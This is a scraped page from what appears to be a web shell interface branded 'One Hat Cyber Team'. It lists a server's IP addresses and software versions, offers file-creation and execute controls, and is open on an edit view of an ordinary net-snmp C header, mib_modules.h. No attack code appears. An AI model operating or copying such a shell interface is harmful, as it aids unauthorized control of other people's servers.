One Hat Cyber Team
Your IP :
172.69.214.198
Server IP :
188.114.97.3
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
include
/
net-snmp
/
agent
/
Edit File:
mib_modules.h
#ifndef MIB_MODULES_H #define MIB_MODULES_H #ifdef __cplusplus extern "C" { #endif #define DO_INITIALIZE 1 #define DONT_INITIALIZE 0 struct module_init_list { char *module_name; struct module_init_list *next; }; void add_to_init_list(char *module_list); int should_init(const char *module_name); void init_mib_modules(void); #ifdef __cplusplus } #endif #endif
Simpan